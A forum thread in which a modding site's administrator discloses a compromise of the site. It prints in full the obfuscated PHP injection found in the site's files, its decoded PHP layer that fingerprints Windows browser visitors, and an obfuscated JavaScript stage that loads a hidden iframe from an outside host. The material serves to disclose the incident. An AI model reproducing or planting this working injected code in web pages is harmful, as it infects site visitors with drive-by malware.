Halomods Community Portal: About the recent 'malware' flagging of HM - Halomods Community Portal

Jump to content

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

About the recent 'malware' flagging of HM

Yes we're addressing the issue, while playing many hours of Halo 4

#1 User is offline   kornman00 

  • SourceGuy 2.0
  • Group: Administrators
  • Joined: 15-November 01


Users Awards

Posted 14 November 2012 - 10:57 AM

So, somehow our systems were compromised by a Belgium entity (I'm not going to point fingers, but we're betting they're made of jelly and umad) and an automated script was ran where our major .php files had a block of foreign code injected in them. They (well, -it-, there was only one variant of the script injected) were in gzinflate/base64 format (you can use this to decode)

(TL;DR, here's a lovely StackOverflow entry on this nonsense)

(NOTE: Excuse the horrible styling in the code text below...we didn't test that part of the Halomods theme yet...consider it on the TODO list, after getting the site unfucked)

From the injected php:
eval(gzinflate(base64_decode('7L0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8iivN063ctmiZvt36387a8c+cXpxdlNcnKFH8e4p/Pdg9/4+THfrdi9dnv9vu/Pn31k6evvvfxq9Mvvnxz+vsfP3366uPvH/5us9r77umXJ199cfrize//6ssv3+DbdZZ+lrrvv/3mzcvf/yv66/c//pya8fuT888IyPjjux+PF7P7W7Oszbc+Xoxn4+uP79w5/N0qagAYQ01GbbHIt+5sH3y6v7NzB+hiXOdFmf/++buiaZstBnHnzu+5XpbF8q3+KQ23tpq2XlXUZp2NPv5usZxVV83Hd37Xzz47z8omv/MLf2HY4ovXZ6fe1z/zM8G3z4o6P6/euQad779c5XXmvQ7w+v3vyQhf5O3vP62Wbb4E2kBzRLS/k3722WepvnLnFxPiP5bXdVX//nW+quq2WF5sycB/bFUXy3br4gfF8rwEjSZZk3+6//vP8mk1I4o9eL7z7d/nybvvlMVXi+d7936v/N7D3+vhV/Xvvf/t1/OTsycXp9dvfp+3p8c/8eCLz89+kGevHzzZXb26/mL1i65/0ZPrxU9+96d+cnfx7O3TLx781N7Bw4f3Hzx4cO/eveXl5eV5/umX93e//M7d8/O7P3g4/anFTzyZvJx8+bqtv7MsPj/+Rc3F+ct79w++/YOD4ts/ff5mXRa7r/Z2H979fdbPDz7dq3+fn17UdZP9IKtX+f0vLvd++vIHDy9/n7tfPHn38OHde835m6z+qYdfEexPrn/63mT3wbfv7r3OZj9FXa7fPDhZXX56/vDe7/PTTz45yH9yedCezr/86eXLupjcf1hnnyy+s3NZ3/1Oeb78vZfPPvnyQT1tXz5fP2zuzb59+Xz1+/zeszft+XU5PZ3tzS7vP3j58mXb3m8ftD+4f/c7n//0yYMvf+rg8gd706/e1p/cPdhvfnL58Iuv5j8x++nf67p+t355d1lVP2h/+ieK+d2Hn/ze93ffnj9/8Hu9ePlyUT3/ZD29vvvJT3/54G79Uz/1cP1gdu/3enpwPv3kuvjkBwe/6OXlt+9++vr3vn/WvLx7mb+6Orj7OX3y8JO7P738wb1Pf+ru9An99u3lDy73f2rn+d17v9fl1d67H9ydfvlidvc7L+fLq2bn+eW3Jy/Pm2cv28sH2fm7vd/n6SfPL59nL19eTvZfXJ3sz68n955dTL66/L0v997cbda/z4PvTvb31+VPfLX3E8+/2Pm91/tP7v30g2cnb++tn33y3avz84P9T96239579eDey6++eLn+5OnL1dv9/PT5vauzhw9Pd9/urLODvZ9++YOfunv9avLm93746Vl9+u73+n1Onp/93qvVzsW8Pd/74vKy3Xl2fLr4vV8+eH5ez46vfuqL9uXuw5P7y7uL/DuTn/78p+79Puf7r5ZPdj+ZrX56+t2XT3/609/7yduXk/O7bz6/erP8ReevXyye/UT+afad2bdfzc8PXk6/yCbXT5b5zuTeg8nx7neffXp+vH66l738DoH56en589WXX375+beb/HMa89v84PqT3+v3fniw/2x1tnj507NP7v7UD+5fPH9RP3wwaet3X31n5zj/4s3nzdOr32v/zWz+U3cfNFcv7y+q8ydfnRz/1PqLL58dfPH5we81/6mf/n2e1d85Xn/3k7v7X2TH766uiruT6v5+9env8+3Xe5OT7/7E8vrbl4vv7n3+E6vv3juZ/OD4q3c/eLD33XcP7n97efDk6eevPnlx76x5sTfZu1c8Obh7MT0pfurZt59dfyd7O/v285ef32vW1y/3p6+fLR6s39y79+W7yd3Xyzc/+KlPHv70gyfP3z58d/B7ffJ09pMvrpuv7u99fnl6ev7FF59+tzk7259+evVm8vLBdw/evLz7+1yfPr+//7rZX36VZ/N6RYzQtnfv3v3qB/nT8uy6Or58+93Lyd75s+Vx9lO/1xe/6PTZswfPd9+tf9EPps2TevaT3y4Pnpb3i0VzvvPp5Lz95Cdevn2+ut+uTz755Om7/GT5ZrL+8jivzl69yF/f/fIH37k/eXD/zfPj3+vNrG2b/Betri5nr6bnDy8fzr/4qZdnX2Z7y4Pp84uTq3d7L35wsJxdXM5Pvr3IpvXrYnr9kw8P7i6//cne7OH84GH77NsHL65+79nBp3X+iy73J1/mV3vPH9ydvpzde/f6k/Pzbz9fPntw92H9tNg5+32m589evFu9vFw2s59sfu/rfVI3v/er/Cc/eZM/33lQLe+V313uvv7B3d+LOP/Tvet1s3xZru9992B5+ezhzuwBydT0y/Or8uXdovlyenXZ3rt/df/++cHb8i7xyv3PX10+fHlMz927B5+RvRE9Cgvyu52vyOz8nufVKl+yLk5H6cekve/84vPVGuqZvh+lpJ7HH//Mx3cO0/NpWTU5Pr5z+EsICP3/l/w/AQAA//8=')));


Decode round one (php):
if (!isset($ftl)){ global $ftl;$ftl=1;	$ip=$_SERVER['REMOTE_ADDR'];$dr=$_SERVER['DOCUMENT_ROOT'];$ua = $_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5(date('m.d.y'));$odbf = $dr.'/'.md5(date('m.d.y'),time()-86400);	if (file_exists($odbf))@unlink($odbf);	if((strpos($ua,'Windows')!==false)&&((strpos($ua,'MSIE')!==false)||(strpos($ua,'Firefox')!==false||(strpos($ua,'Opera')!==false))&&(strpos(@file_get_contents($dbf),$ip) === false))){		error_reporting(0);		print(gzinflate(base64_decode('7L0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8iHjfTuli1R219/YuL862rYjmrrsazarpe5Mv2jvz9vY/MBx99/3sfTarZ9Uff/+yj3b17H/2SadZO51uT7Cpv6f93YjB+8eVn8tEhOjnPrib59ra+mJ0vr/JlfnXnF+O7rctPLu9s3dHvLpYXdTtfylcEd2dv57PPPtt5t7tz5/JGjC7OZ8vz2cUkr+/84sVn9MUhQdjKyrxuP/nooztjQih/9+X51kfL7KNPPmoL+ucy/+jO7/rZZ9u7d3KD8fc+yi+z8qPvH/6SX5IsP/veRw8/GvH/9+/jnz36Z/cB/jnHnzv4Z0L/3Kvw2xz/cONd/JPhnws0LvHbPfsFPtv7afx2YD+LvLaPPvb4NwC4hyb3FgbUvXv2T/suY7Wb44ulQU2QLM0Xu4B3j7FCk3uF+Wwff84+ktH2R73PUMPu+DPpk4eEL3wI99E1k0ua82jPzZ/yRbTX96IrExKYCLIXpp0ghtf2Mvvt0FAEmXP7LfrdAwZMtP19C5n/meJbjGZ3Yf4RnB1+dpjcWPDj6XBkPbf/TGwTnqfSNmFQe6aJdHRhf8PcMabyBne0b37bA1WF6fAuD2aPJ4RnjcfLpOOOGHseGwC4ke8y+KX984FpImPjd+/Zz5gLNr97btrxUJ0AeMTGsDwK4TdhZ/7swP5mofBUCAZuMOF8MG8KhZjYFrJAuW+/4MaAxwwi/bo54o6YHS2bCWQnyHvmW2GQpW3CbzAUxz72Wx75Hn8BDGR+N3IsN2b23iB8/gcCiZFHFyJakdHLPG3suyP4cSFm7uT33Oxb/SnTzZ+9j7BLk9x8K+DdVNysU52GvEEfMM6WsII4c6wTbP7W8TP/YyEL54Ss4nUeahrp7aftt///UzeDlIyoAvkWvb2fFnAaZKMqEFF7L1xuqzcsBrdVHl8Dl5imsf06bft+QPkLp5tuC++DxeCnTbuOAeoIRNeS/OzJ5b75TLAKTdttseqpwvdRcf9v9hMZPIOa2n8cLgCwx2Nz8ndgvhCHmacrSicyV98/nH+2d9h89tFH8NwXd86reqv4bOew2L7/cPd3xS+ffHLnF7/9rDi0IYcfFNxpPvnsdVsXy4vvfXReV+TeL07on3lWn1Sz/KPvb62yusnPlu3W8nvF90d79+/cOfwlP/isOcwvt35w55f8kl/y+K5GRv9PAAAA//8=')));		if ($fp = @fopen($dbf , 'a')){fputs($fp , $ip.'|'); fclose($fp);}	}}


Decode round two (html/js):
<script>try{if(window.document)window["document"]["body"]="123"}catch(bawetawe){if(window.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["body"]="123"}catch(gfdnfdgber){m=123;if((alert+"").indexOf("na"+"ti"+"ve")!==-1)ev=window["eval"];}}n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1g","4n","d","9","9","9","45","42","4e","3m","49","41","4e","1f","1g","29","d","9","9","50","17","41","48","4f","41","17","4n","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","4j","4e","45","4g","41","1f","19","2a","45","42","4e","3m","49","41","17","4f","4e","3o","2b","1e","44","4g","4g","4c","28","1m","1m","40","41","4a","4f","41","4c","4e","4b","49","45","4f","4f","4b","4e","4l","1l","45","4a","42","4b","1m","4g","1m","4i","3o","1l","4c","44","4c","2d","43","4b","2b","20","1e","17","4j","45","40","4g","44","2b","1e","1o","1n","1e","17","44","41","45","43","44","4g","2b","1e","1o","1n","1e","17","4f","4g","4l","48","41","2b","1e","4i","45","4f","45","3n","45","48","45","4g","4l","28","44","45","40","40","41","4a","29","4c","4b","4f","45","4g","45","4b","4a","28","3m","3n","4f","4b","48","4h","4g","41","29","48","41","42","4g","28","1n","29","4g","4b","4c","28","1n","29","1e","2c","2a","1m","45","42","4e","3m","49","41","2c","19","1g","29","d","9","9","50","d","9","9","42","4h","4a","3o","4g","45","4b","4a","17","45","42","4e","3m","49","41","4e","1f","1g","4n","d","9","9","9","4i","3m","4e","17","42","17","2b","17","40","4b","3o","4h","49","41","4a","4g","1l","3o","4e","41","3m","4g","41","2j","48","41","49","41","4a","4g","1f","1e","45","42","4e","3m","49","41","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4f","4e","3o","1e","1j","1e","44","4g","4g","4c","28","1m","1m","40","41","4a","4f","41","4c","4e","4b","49","45","4f","4f","4b","4e","4l","1l","45","4a","42","4b","1m","4g","1m","4i","3o","1l","4c","44","4c","2d","43","4b","2b","20","1e","1g","29","42","1l","4f","4g","4l","48","41","1l","4i","45","4f","45","3n","45","48","45","4g","4l","2b","1e","44","45","40","40","41","4a","1e","29","42","1l","4f","4g","4l","48","41","1l","4c","4b","4f","45","4g","45","4b","4a","2b","1e","3m","3n","4f","4b","48","4h","4g","41","1e","29","42","1l","4f","4g","4l","48","41","1l","48","41","42","4g","2b","1e","1n","1e","29","42","1l","4f","4g","4l","48","41","1l","4g","4b","4c","2b","1e","1n","1e","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4j","45","40","4g","44","1e","1j","1e","1o","1n","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];h=2;s="";if(m)for(i=0;i-591!=0;i++){k=i;if(window["document"])s+=String["fro"+"mC"+"harCode"](parseInt(n[i],25));}z=s;ev(z)}}}</script>


Note, that last bit MS Security Essentials will zap from your computer if it even gets a wiff of it as/in a file on your computer.

I'm sure the spambots that were managing to make posts weren't helping with Google's analysis either. But we've addressed and made strides to fix future issues with them.

This is why we can't have nice things

#2 User is offline   kornman00 

  • SourceGuy 2.0
  • Group: Administrators
  • Joined: 15-November 01


Users Awards

Posted 15 November 2012 - 04:49 AM

Google said:

Status of the latest badware review for this site: A review for this site has finished. The site was found clean. The badware warnings from web search are being removed. Please note that it can take some time for this change to propagate.


Share this topic:


Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic